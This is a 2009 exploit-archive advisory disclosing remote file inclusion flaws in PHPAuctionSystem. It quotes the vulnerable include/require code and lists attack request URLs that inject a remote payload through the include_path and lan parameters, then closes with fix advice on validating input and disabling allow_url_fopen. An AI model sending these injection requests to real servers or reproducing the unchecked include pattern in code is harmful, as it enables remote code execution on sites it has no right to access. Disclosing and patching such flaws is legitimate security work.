[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHPAuctionSystem Multiple Remote File Inclusion Vulnerabilities
# Published : 2009-01-06
# Author : darkmasking
# Previous Title : QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability
# Next Title : RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit
[??]=======================================================================================================[_][-][X]
[??] [??]
[??] PHPAuctionSystem Multiple Remote File Inclusion Vulnerability [??]
[??] [??]
[??] ======= ------d-------m------ ==== ==== [??]
[??] || = | |(o o)| | || || || [??]
[??] || = ||(~)|| || || [??]
[??] ======= /| || || [??]
[??]=============================================================================================================[??]
[??] Author : ~darkmasking~ [??]
[??] Date : January, 6th 2009 [??]
[??] Web : https://www.idsafeshield.com [??]
[??] Contact : support[at]idsafeshield[dot]com [??]
[??] Critical Level : Dangerous [??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??] Affected software description : [??]
[??] Software : PHP Auction System [??]
[??] Vendor : http://www.phpauctions.info/ [??]
[??] Price : $59.99 [??]
[??]=============================================================================================================[??]
[??] [??]
[??] [~] Vulnerable file [??]
[??] [??]
[??] [+] all file below is affected by "include_path" parameter [??]
[??] [??]
[??] ./includes/settings.inc.php [??]
[??] $password_file = $include_path."passwd.inc.php"; [??]
[??] include($password_file); [??]
[??] include $include_path."fonts.inc.php"; [??]
[??] include $include_path."fontsize.inc.php"; [??]
[??] include($include_path."currency.inc.php"); [??]
[??] include($include_path."errors.inc.php"); [??]
[??] include($include_path."https.inc.php"); [??]
[??] [??]
[??] ./includes/auction_confirmation.inc.php [??]
[??] require("./includes/messages.inc.php"); [??]
[??] [??]
[??] ./includes/converter.inc.php [??]
[??] include($include_path."nusoap.php"); [??]
[??] [??]
[??] ./includes/messages.inc.php [??]
[??] require($include_path.'messages.'.$language.'.inc.php'); [??]
[??] [??]
[??] ./includes/stats.inc.php [??]
[??] include $prefix."includes/useragent.inc.php"; [??]
[??] include $prefix."includes/domains.inc.php"; [??]
[??] [??]
[??] ./includes/useragent.inc.php [??]
[??] include $prefix."includes/browsers.inc.php"; [??]
[??] include $prefix."includes/platforms.inc.php"; [??]
[??] [??]
[??] ./includes/user_confirmation.inc.php [??]
[??] require("./includes/messages.inc.php"); [??]
[??] [??]
[??] [??]
[??] [+] All file below is affected by "lan" parameter [??]
[??] [??]
[??] ./browse.php [??]
[??] ./search.php [??]
[??] if(!empty($_GET['lan'])) { [??]
[??] $language = $lan; [??]
[??] $_SESSION['language'] = $language; [??]
[??] [??]
[??] #// Set language cookie [??]
[??] setcookie("USERLANGUAGE",$lan,time()+31536000,"/"); [??]
[??] } elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) { [??]
[??] $language = $SETTINGS['defaultlanguage']; [??]
[??] $_SESSION['language'] = $language; [??]
[??] [??]
[??] #// Set language cookie [??]
[??] setcookie("USERLANGUAGE",$language,time()+31536000); [??]
[??] } elseif(isset($_COOKIE['USERLANGUAGE'])) { [??]
[??] $language = $_COOKIE['USERLANGUAGE']; [??]
[??] } [??]
[??] [??]
[??] require($include_path.'messages.'.$language.'.inc.php'); [??]
[??] [??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??] [??]
[??] [~] Exploit [??]
[??] [??]
[??] [+] "include_path" parameter [??]
[??] [??]
[??] http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode] [??]
[??] http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode] [??]
[??] http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode] [??]
[??] http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode] [??]
[??] http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode] [??]
[??] http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode] [??]
[??] http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode] [??]
[??] [??]
[??] [??]
[??] [+] "lan" parameter [??]
[??] [??]
[??] http://www.darkvictims.com/[path]/browse.php?lan=[darkcode] [??]
[??] http://www.darkvictims.com/[path]/search.php?lan=[darkcode] [??]
[??] [??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??] [??]
[??] [~] How to fix this vulnerability [??]
[??] [??]
[??] Edit the source code to ensure that input is properly validated. Where is possible, [??]
[??] it is recommended to make a list of accepted filenames and restrict the input to that list. [??]
[??] [??]
[??] For PHP, the option allow_url_fopen would normally allow a programmer to open, [??]
[??] include or otherwise use a remote file using a URL rather than a local file path. [??]
[??] It is recommended to disable this option from php.ini. [??]
[??] [??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??] [??]
[??] [~] Greetz [??]
[??] [??]
[??] BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ] [??]
[??] [??]
[??] [??]
[??]=============================================================================================================[??]
# www.Syue.com [2009-01-06]